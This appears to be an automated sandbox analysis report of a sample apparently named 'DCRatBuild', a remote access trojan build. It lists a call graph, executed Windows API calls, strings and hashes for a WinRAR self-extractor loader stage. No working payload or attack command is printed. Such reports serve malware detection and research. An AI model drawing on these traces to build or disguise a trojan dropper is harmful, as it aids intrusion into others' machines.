24912->24929 24913 4bc564 24913->24912 24920 4bc479 24913->24920 24916->24899 24917->24896 24918->24901 24919->24913 24921 4bb136 _unexpected 20 API calls 24920->24921 24922 4bc48b 24921->24922 24924 4baf0a 11 API calls 24922->24924 24926 4bc498 24922->24926 24923 4b8dcc _free 20 API calls 24925 4bc4ea 24923->24925 24924->24922 24925->24913 24926->24923 24927->24909 24928->24911 24929->24911 24931 4aec50 24930->24931 24932 4a086d GetModuleHandleW 24931->24932 24933 4a0888 GetProcAddress 24932->24933 24934 4a08e7 24932->24934 24936 4a08b9 GetProcAddress 24933->24936 24937 4a08a1 24933->24937 24935 4a0c14 GetModuleFileNameW 24934->24935 25035 4b75fb 42 API calls __vsnwprintf_l 24934->25035 24938 4a0c32 24935->24938 24945 4a08cb 24936->24945 24937->24936 24949 4a0c94 GetFileAttributesW 24938->24949 24951 4a0c5d CompareStringW 24938->24951 24952 4a0cac 24938->24952 25026 49b146 24938->25026 25029 4a081b 24938->25029 24940 4a0b54 24940->24935 24941 4a0b5f GetModuleFileNameW CreateFileW 24940->24941 24942 4a0c08 CloseHandle 24941->24942 24943 4a0b8f SetFilePointer 24941->24943 24942->24935 24943->24942 24944 4a0b9d ReadFile 24943->24944 24944->24942 24948 4a0bbb 24944->24948 24945->24934 24948->24942 24950 4a081b 2 API calls 24948->24950 24949->24938 24949->24952 24950->24948 24951->24938 24953 4a0cb7 24952->24953 24956 4a0cec 24952->24956 24955 4a0cd0 GetFileAttributesW 24953->24955 24957 4a0ce8 24953->24957 24954 4a0dfb 24978 4aa64d GetCurrentDirectoryW 24954->24978 24955->24953 24955->24957 24956->24954 24958 49b146 GetVersionExW 24956->24958 24957->24956 24959 4a0d06 24958->24959 24960 4a0d0d 24959->24960 24961 4a0d73 24959->24961 24962 4a081b 2 API calls 24960->24962 24963 494092 _swprintf 51 API calls 24961->24963 24964 4a0d17 24962->24964 24965 4a0d9b AllocConsole 24963->24965 24966 4a081b 2 API calls 24964->24966 24967 4a0da8 GetCurrentProcessId AttachConsole 24965->24967 24968 4a0df3 ExitProcess 24965->24968 24970 4a0d21 24966->24970 25036 4b3e13 24967->25036 24972 49e617 53 API calls 24970->24972 24971 4a0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24971->24968 24973 4a0d3c 24972->24973 24974 494092 _swprintf 51 API calls 24973->24974 24975 4a0d4f 24974->24975 24976 49e617 53 API calls 24975->24976 24977 4a0d5e 24976->24977 24977->24968 24978->24778 24980 4a081b 2 API calls 24979->24980 24981 4aac2a OleInitialize 24980->24981 24982 4aac4d GdiplusStartup SHGetMalloc 24981->24982 24982->24780 24984 4ac5ce 24983->24984 24985 4ac6e4 24984->24985 24986 4a1fac CharUpperW 24984->24986 25038 49f3fa 82 API calls 2 library calls 24984->25038 24985->24788 24985->24789 24986->24984 24989 4aec50 24988->24989 24990 4adbeb SetEnvironmentVariableW 24989->24990 24992 4adc0e 24990->24992 24991 4adc36 24991->24783 24992->24991 24993 4adc2a SetEnvironmentVariableW 24992->24993 24993->24991 24995 4ab70b GetObjectW 24994->24995 24996 4ab6fe 24994->24996 24998 4ab71a 24995->24998 25039 4aa6c2 FindResourceW 24996->25039 25000 4aa5c6 4 API calls 24998->25000 25003 4ab72d 25000->25003 25001 4ab770 25013 49da42 25001->25013 25002 4ab74c 25053 4aa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25002->25053 25003->25001 25003->25002 25005 4aa6c2 12 API calls 25003->25005 25006 4ab73d 25005->25006 25006->25002 25008 4ab743 DeleteObject 25006->25008 25007 4ab754 25054 4aa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25007->25054 25008->25002 25010 4ab75d 25055 4aa80c 8 API calls 25010->25055 25012 4ab764 DeleteObject 25012->25001 25064 49da67 25013->25064 25018 4a90b7 25019 4aeb38 8 API calls 25018->25019 25020 4a90d6 25019->25020 25020->24802 25022 4aacab GdiplusShutdown CoUninitialize 25021->25022 25022->24818 25024->24810 25025->24817 25027 49b15a GetVersionExW 25026->25027 25028 49b196 25026->25028 25027->25028 25028->24938 25030 4aec50 25029->25030 25031 4a0828 GetSystemDirectoryW 25030->25031 25032 4a085e 25031->25032 25033 4a0840 25031->25033 25032->24938 25034 4a0851 LoadLibraryW 25033->25034 25034->25032 25035->24940 25037 4b3e1b 25036->25037 25037->24971 25037->25037 25038->24984 25040 4aa7d3 25039->25040 25041 4aa6e5 SizeofResource 25039->25041 25040->24995 25040->24998 25041->25040 25042 4aa6fc LoadResource 25041->25042 25042->25040 25043 4aa711 LockResource 25042->25043 25043->25040 25044 4aa722 GlobalAlloc 25043->25044 25044->25040 25045 4aa73d GlobalLock 25044->25045 25046 4aa7cc GlobalFree 25045->25046 25047 4aa74c __InternalCxxFrameHandler 25045->25047 25046->25040 25048 4aa7c5 GlobalUnlock 25047->25048 25056 4aa626 GdipAlloc 25047->25056 25048->25046 25051 4aa79a GdipCreateHBITMAPFromBitmap 25052 4aa7b0 25051->25052 25052->25048 25053->25007 25054->25010 25055->25012 25057 4aa638 25056->25057 25058 4aa645 25056->25058 25060 4aa3b9 25057->25060 25058->25048 25058->25051 25058->25052 25061 4aa3da GdipCreateBitmapFromStreamICM 25060->25061 25062 4aa3e1 GdipCreateBitmapFromStream 25060->25062 25063 4aa3e6 25061->25063 25062->25063 25063->25058 25065 49da75 _wcschr __EH_prolog 25064->25065 25066 49daa4 GetModuleFileNameW 25065->25066 25067 49dad5 25065->25067 25068 49dabe 25066->25068 25110 4998e0 25067->25110 25068->25067 25070 49db31 25121 4b6310 25070->25121 25071 49959a 80 API calls 25073 49da4e 25071->25073 25072 49e261 78 API calls 25075 49db05 25072->25075 25108 49e29e GetModuleHandleW FindResourceW 25073->25108 25075->25070 25075->25072 25088 49dd4a 25075->25088 25076 49db44 25077 4b6310 26 API calls 25076->25077 25085 49db56 ___vcrt_FlsGetValue 25077->25085 25078 49dc85 25078->25088 25141 499d70 81 API calls 25078->25141 25080 499e80 79 API calls 25080->25085 25082 49dc9f ___std_exception_copy 25083 499bd0 82 API calls 25082->25083 25082->25088 25086 49dcc8 ___std_exception_copy 25083->25086 25085->25078 25085->25080 25085->25088 25135 499bd0 25085->25135 25140 499d70 81 API calls 25085->25140 25086->25088 25106 49dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25086->25106 25142 4a1b84 MultiByteToWideChar 25086->25142 25088->25071 25089 49e159 25094 49e1de 25089->25094 25148 4b8cce 26 API calls ___std_exception_copy 25089->25148 25092 49e16e 25149 4b7625 26 API calls ___std_exception_copy 25092->25149 25093 49e1c6 25150 49e27c 78 API calls 25093->25150 25095 49e214 25094->25095 25098 49e261 78 API calls 25094->25098 25099 4b6310 26 API calls 25095->25099 25098->25094 25100 49e22d 25099->25100 25101 4b6310 26 API calls 25100->25101 25101->25088 25103 4a1da7 WideCharToMultiByte 25103->25106 25106->25088 25106->25089 25106->25103 25143 49e5b1 50 API calls __vsnprintf 25106->25143 25144 4b6159 26 API calls 3 library calls 25106->25144 25145 4b8cce 26 API calls ___std_exception_copy 25106->25145 25146 4b7625 26 API calls ___std_exception_copy 25106->25146 25147 49e27c 78 API calls 25106->25147 25109 49da55 25108->25109 25109->25018 25111 4998ea 25110->25111 25112 49994b CreateFileW 25111->25112 25113 49996c GetLastError 25112->25113 25117 4999bb 25112->25117 25114 49bb03 GetCurrentDirectoryW 25113->25114 25115 49998c 25114->25115 25116 499990 CreateFileW GetLastError 25115->25116 25115->25117 25116->25117 25119 4999b5 25116->25119 25118 4999ff 25117->25118 25120 4999e5 SetFileTime 25117->25120 25118->25075 25119->25117 25120->25118 25122 4b6349 25121->25122 25123 4b634d 25122->25123 25134 4b6375 25122->25134 25151 4b91a8 20 API calls _free 25123->25151 25125 4b6699 25127 4afbbc CatchGuardHandler 5 API calls 25125->25127 25126 4b6352 25152 4b9087 26 API calls ___std_exception_copy 25126->25152 25130 4b66a6 25127->25130 25129 4b635d 25131 4afbbc CatchGuardHandler 5 API calls 25129->25131 25130->25076 25132 4b6369 25131->25132 25132->25076 25134->25125 25153 4b6230 5 API calls CatchGuardHandler 25134->25153 25136 499bdc 25135->25136 25138 499be3 25135->25138 25136->25085 25138->25136 25139 499785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25138->25139 25154 496d1a 77 API calls 25138->25154 25139->25138 25140->25085 25141->25082 25142->25106 25143->25106 25144->25106 25145->25106 25146->25106 25147->25106 25148->25092 25149->25093 25150->25094 25151->25126 25152->25129 25153->25134 25154->25138 25156 4b7ce1 _unexpected 25155->25156 25157 4b7cfa 25156->25157 25158 4b7ce8 25156->25158 25179 4bac31 EnterCriticalSection 25157->25179 25191 4b7e2f GetModuleHandleW 25158->25191 25161 4b7ced 25161->25157 25192 4b7e73 GetModuleHandleExW 25161->25192 25162 4b7d9f 25180 4b7ddf 25162->25180 25166 4b7d76 25170 4b7d8e 25166->25170 25174 4b8a91 _abort 5 API calls 25166->25174 25168 4b7de8 25201 4c2390 5 API calls CatchGuardHandler 25168->25201 25169 4b7dbc 25183 4b7dee 25169->25183 25175 4b8a91 _abort 5 API calls 25170->25175 25174->25170 25175->25162 25176 4b7d01 25176->25162 25176->25166 25200 4b87e0 20 API calls _abort 25176->25200 25179->25176 25202 4bac81 LeaveCriticalSection 25180->25202 25182 4b7db8 25182->25168 25182->25169 25203 4bb076 25183->25203 25186 4b7e1c 25189 4b7e73 _abort 8 API calls 25186->25189 25187 4b7dfc GetPEB 25187->25186 25188 4b7e0c GetCurrentProcess TerminateProcess 25187->25188 25188->25186 25190 4b7e24 ExitProcess 25189->25190 25191->25161 25193 4b7e9d GetProcAddress 25192->25193 25194 4b7ec0 25192->25194 25195 4b7eb2 25193->25195 25196 4b7ecf 25194->25196 25197 4b7ec6 FreeLibrary 25194->25197 25195->25194 25198 4afbbc CatchGuardHandler 5 API calls 25196->25198 25197->25196 25199 4b7cf9 25198->25199 25199->25157 25200->25166 25202->25182 25204 4bb09b 25203->25204 25208 4bb091 25203->25208 25205 4bac98 _unexpected 5 API calls 25204->25205 25205->25208 25206 4afbbc CatchGuardHandler 5 API calls 25207 4b7df8 25206->25207 25207->25186 25207->25187 25208->25206 25396 4ab1b0 GetDlgItem EnableWindow ShowWindow SendMessageW

                                                                                                                        Executed Functions

                                                                                                                        Function 004ADF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A0863: GetModuleHandleW.KERNEL32(kernel32), ref: 004A087C
                                                                                                                          • Part of subcall function 004A0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004A088E
                                                                                                                          • Part of subcall function 004A0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004A08BF
                                                                                                                          • Part of subcall function 004AA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004AA655
                                                                                                                          • Part of subcall function 004AAC16: OleInitialize.OLE32(00000000), ref: 004AAC2F
                                                                                                                          • Part of subcall function 004AAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004AAC66
                                                                                                                          • Part of subcall function 004AAC16: SHGetMalloc.SHELL32(004D8438), ref: 004AAC70
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004ADF5C
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004ADF83
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004ADF94
                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 004ADFCE
                                                                                                                          • Part of subcall function 004ADBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ADBF4
                                                                                                                          • Part of subcall function 004ADBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ADC30
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004ADFD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EEC90,00000800), ref: 004ADFF2
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,004EEC90), ref: 004ADFFE
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 004AE009
                                                                                                                        • _swprintf.LIBCMT ref: 004AE048
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004AE05A
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004AE061
                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 004AE078
                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 004AE0C9
                                                                                                                        • Sleep.KERNEL32(?), ref: 004AE0F7
                                                                                                                        • DeleteObject.GDI32 ref: 004AE130
                                                                                                                        • DeleteObject.GDI32(?), ref: 004AE140
                                                                                                                        • CloseHandle.KERNEL32 ref: 004AE183
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzN
                                                                                                                        • API String ID: 3049964643-3307994349
                                                                                                                        • Opcode ID: f7e0d895a9b6312f7fc791d2f9e64b54c28e8d37396878563089620dd243c997
                                                                                                                        • Instruction ID: 41262eb7433939d0a65362ddbf9a7a70adb621f19a0e63c28359699916aae233
                                                                                                                        • Opcode Fuzzy Hash: f7e0d895a9b6312f7fc791d2f9e64b54c28e8d37396878563089620dd243c997
                                                                                                                        • Instruction Fuzzy Hash: 1E611671904240AFD320AF66DC49F6B37ACAB66309F04043FF946962A2DB7C9D44C76E
                                                                                                                        Function 004AA6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 802 4aa6c2-4aa6df FindResourceW 803 4aa7db 802->803 804 4aa6e5-4aa6f6 SizeofResource 802->804 805 4aa7dd-4aa7e1 803->805 804->803 806 4aa6fc-4aa70b LoadResource 804->806 806->803 807 4aa711-4aa71c LockResource 806->807 807->803 808 4aa722-4aa737 GlobalAlloc 807->808 809 4aa73d-4aa746 GlobalLock 808->809 810 4aa7d3-4aa7d9 808->810 811 4aa7cc-4aa7cd GlobalFree 809->811 812 4aa74c-4aa76a call 4b0320 809->812 810->805 811->810 816 4aa76c-4aa78e call 4aa626 812->816 817 4aa7c5-4aa7c6 GlobalUnlock 812->817 816->817 822 4aa790-4aa798 816->822 817->811 823 4aa79a-4aa7ae GdipCreateHBITMAPFromBitmap 822->823 824 4aa7b3-4aa7c1 822->824 823->824 825 4aa7b0 823->825 824->817 825->824
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004AB73D,00000066), ref: 004AA6D5
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA6EC
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA703
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA712
                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004AB73D,00000066), ref: 004AA72D
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004AA73E
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004AA762
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004AA7C6
                                                                                                                          • Part of subcall function 004AA626: GdipAlloc.GDIPLUS(00000010), ref: 004AA62C
                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004AA7A7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004AA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                        • String ID: FjunJ$PNG
                                                                                                                        • API String ID: 211097158-2828676503
                                                                                                                        • Opcode ID: 084f5d045e1518a819975f5574e4e8114b8582669a1a683beb9535abefbcec80
                                                                                                                        • Instruction ID: ac60e3a49dcb7da32ba8bb91fda03df1f043003ebbbc9b7794dd3363489df778
                                                                                                                        • Opcode Fuzzy Hash: 084f5d045e1518a819975f5574e4e8114b8582669a1a683beb9535abefbcec80
                                                                                                                        • Instruction Fuzzy Hash: 3F319379600302AFD7119F21DC48D2B7BB9EF96751B04452AF80582660EF35DD54CA69
                                                                                                                        Function 0049A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1032 49a69b-49a6bf call 4aec50 1035 49a6c1-49a6ce FindFirstFileW 1032->1035 1036 49a727-49a730 FindNextFileW 1032->1036 1037 49a742-49a7ff call 4a0602 call 49c310 call 4a15da * 3 1035->1037 1039 49a6d0-49a6e2 call 49bb03 1035->1039 1036->1037 1038 49a732-49a740 GetLastError 1036->1038 1043 49a804-49a811 1037->1043 1040 49a719-49a722 1038->1040 1047 49a6fe-49a707 GetLastError 1039->1047 1048 49a6e4-49a6fc FindFirstFileW 1039->1048 1040->1043 1049 49a709-49a70c 1047->1049 1050 49a717 1047->1050 1048->1037 1048->1047 1049->1050 1052 49a70e-49a711 1049->1052 1050->1040 1052->1050 1054 49a713-49a715 1052->1054 1054->1040
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6C4
                                                                                                                          • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6F2
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6FE
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A728
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0049A592,000000FF,?,?), ref: 0049A734
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 42610566-0
                                                                                                                        • Opcode ID: 97144dc7c5fbd569374e032b4c57b1475a4fbf33abffad3041330b32677d9e6d
                                                                                                                        • Instruction ID: b10e8e72478c1b5478d1b861f32be11ac0a8a7bd7ebb7403a1fc9f492259510f
                                                                                                                        • Opcode Fuzzy Hash: 97144dc7c5fbd569374e032b4c57b1475a4fbf33abffad3041330b32677d9e6d
                                                                                                                        • Instruction Fuzzy Hash: 6241A772900515ABCB15DF64CC89AEAB7B8FB48354F1441A7F95DE3200D738AE90CF95
                                                                                                                        Function 004B7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002,00000000), ref: 004B7E0F
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002,00000000), ref: 004B7E16
                                                                                                                        • ExitProcess.KERNEL32 ref: 004B7E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 49bef1f45535c8711bf18bbfd4d8705a78b5ef027d38bd336f260dbeb3c0f1f1
                                                                                                                        • Instruction ID: fd247f7b54c16e5ddfd92b881f0001301a69e172c6fd42fd5437068c63f13751
                                                                                                                        • Opcode Fuzzy Hash: 49bef1f45535c8711bf18bbfd4d8705a78b5ef027d38bd336f260dbeb3c0f1f1
                                                                                                                        • Instruction Fuzzy Hash: C5E04F31000144AFCF417F12CD09D8A3F69EF50386B008465F8058A232CB39DE51CBA8
                                                                                                                        Function 0049848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 732d9bfe0a19b3c125e9109ffb77b61b605d899a1e8e1fe5d83853cff23454dd
                                                                                                                        • Instruction ID: 237a413ba954985918b764fd2bfe778fcd487b7c760648e7d913bce577fa31c4
                                                                                                                        • Opcode Fuzzy Hash: 732d9bfe0a19b3c125e9109ffb77b61b605d899a1e8e1fe5d83853cff23454dd
                                                                                                                        • Instruction Fuzzy Hash: 9E820A70904145AEDF15DF68C891BFBBF79AF06304F0841BFE8499B242DB395A88C769
                                                                                                                        Function 004AB7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004AB7E5
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AB8D1
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB8EF
                                                                                                                        • IsDialogMessageW.USER32(?,?), ref: 004AB902
                                                                                                                        • TranslateMessage.USER32(?), ref: 004AB910
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004AB91A
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 004AB93D
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 004AB960
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 004AB983
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AB99E
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AB9B1
                                                                                                                          • Part of subcall function 004AD453: _wcschr.LIBVCRUNTIME ref: 004AD45C
                                                                                                                          • Part of subcall function 004AD453: _wcslen.LIBCMT ref: 004AD47D
                                                                                                                        • SetFocus.USER32(00000000), ref: 004AB9B8
                                                                                                                        • _swprintf.LIBCMT ref: 004ABA24
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                          • Part of subcall function 004AD4D4: GetDlgItem.USER32(00000068,004EFCB8), ref: 004AD4E8
                                                                                                                          • Part of subcall function 004AD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,004AAF07,00000001,?,?,004AB7B9,004C506C,004EFCB8,004EFCB8,00001000,00000000,00000000), ref: 004AD510
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AD51B
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AD529
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD53F
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004AD559
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD59D
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004AD5AB
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD5BA
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD5E1
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,004C43F4), ref: 004AD5F0
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 004ABA68
